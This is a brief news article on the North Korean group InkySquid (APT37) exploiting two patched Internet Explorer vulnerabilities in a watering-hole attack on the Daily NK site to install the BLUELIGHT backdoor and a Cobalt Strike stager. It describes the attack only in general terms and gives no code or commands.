14 DAY TRIAL // InkySquid, a North Korean hacker, exploited two different vulnerabilities in Internet Explorer to infect users using custom Strategic Web Compromise (SWC) operations, according to The Hacker News.
The vulnerabilities in question are CVE-2021-26411 - Internet Explorer Memory Corruption Vulnerability, with a CVSS score of 8.8, and CVE-2020-1380 - Scripting Engine Memory Corruption Vulnerability, with a CVSS score of 7.5. Both vulnerabilities have been actively exploited in the wild, with North Korean hackers compromising the work of research and development security experts in a campaign launched in early January.
A South Korean online publication was the first victim of the hacker also known as APT37 or ScarCruft. The magazine in question, Daily NK, has been infected with malware from the end of March this year and the beginning of June this year. The infection wasn't detected sooner due to the sophisticated design of the malware that permits it to pass off the exploit code as legitimate, says Volexity.
The researchers noted, "While SWCs are not as popular as they once were, they continue to be a weapon in the arsenal of many attackers. The use of recently patched exploits for Internet Explorer and Microsoft Edge will only work against a limited audience".
The modus operandi involved inception
A remote URL was used to submit JavaScript code obfuscated by other jQuery JavaScript libraries provided on the website. The malicious code was then used to exploit the two known Internet Explorer vulnerabilities. Luckily, the bugs were fixed by Microsoft in August 2020 and March 2021, respectively.
The threat actors were able to carry out their attacks undetected with additional customized malware. After the successful hack, the hackers were able to deploy a novel backdoor called BLUELIGHT and a Cobalt Strike stager.
Malware of this type is capable of executing shellcode, intercepting passwords and cookies from the Internet Explorer, Chrome, and Edge browsers, collecting information about the installed antivirus software, collecting system metadata, and doing a variety of other harmful activities.